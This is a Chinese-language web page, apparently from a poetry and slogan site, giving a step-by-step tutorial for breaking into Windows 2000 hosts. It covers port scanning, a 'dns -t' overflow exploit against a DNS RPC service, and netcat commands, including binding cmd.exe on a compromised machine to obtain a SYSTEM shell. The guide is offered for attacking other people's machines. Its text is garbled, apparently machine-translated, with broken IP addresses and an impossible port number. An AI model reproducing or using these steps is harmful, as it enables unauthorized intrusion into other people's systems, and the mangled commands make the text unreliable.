古詩詞大全網 - 口號大全 - 如何利用dns漏洞入侵

如何利用dns漏洞入侵

前提是打開端口53和445,1,選擇superscan進行掃描,在端口列表中勾選端口53和445,然後選擇主機段進行掃描。

2.選擇端口為53和445的主機,在cmd下輸入dns -t ip,掃描主機的特定漏洞端口,即“1028 :Vulnerability”。

端口1028中存在溢出漏洞。“OS:windows 2000”表示系統類型是windows 2000。

3.執行dns -t 2000all ip 1028時目標主機溢出。與目標主機tcp端口的連接已建立成功連接到主機的TCP端口。

成功綁定到易受攻擊的DCER PC接口已連接到對方的R PC端口,操作系統指紋結果:Windows 2000。

系統指紋識別表明對手是wind2000系統,攻擊發送的攻擊代碼,Checkport 1100已成功發送,嘗試連接端口1100。當最後壹句出現時

提示語句意味著我們將要成功。

4.如何連接對方的1100端口?當然我們會用nc。

5.nc的全稱是“netcat”,是壹個非常簡單易用的基於tcp/ip協議(c/s模式)的瑞士軍刀。以下是它的壹些常用功能。

1,nc.exe-vv-l-p6069,表示監聽本地6069端口。-vv:顯示詳細信息。-l: Monitor和Monitor入站信息。-p:用於監控。

端口號。

2.就像我們遇到的,對方開了壹個端口。他在等我們連接。哦,當我們連接時會發生什麽?當然是系統權限的外殼。

NC . exe-vv 127 . 0 . 0 . 1 5257,連接到ip為127.0.1的端口5257。

3.還可以在監聽本地端口的同時綁定shell,相當於telnet服務器。通常這個命令是在肉雞上執行的,然後我們連上就可以得到了。

這個殼沒了。NC . exe-L-p 5257-T-E cmd.exe,在本機的5257端口監聽並綁定cmd.exe。-e的作用是面向程序。-t以telnet的形式

來回答。

4.可用於手動向主機(通常為80)端口提交數據包,NC . exe-vv 127 . 0 . 0 . 1 80

的內容。

6.在介紹了nc.exe的四種常用方式之後,現在我們知道如何使用nc鏈接對方的端口1100了。我們用NC-vv 127 . 0 . 1100連接對方的端口165438。

成功獲得了壹個具有系統權限的cmdshell,現在可以為所欲為了。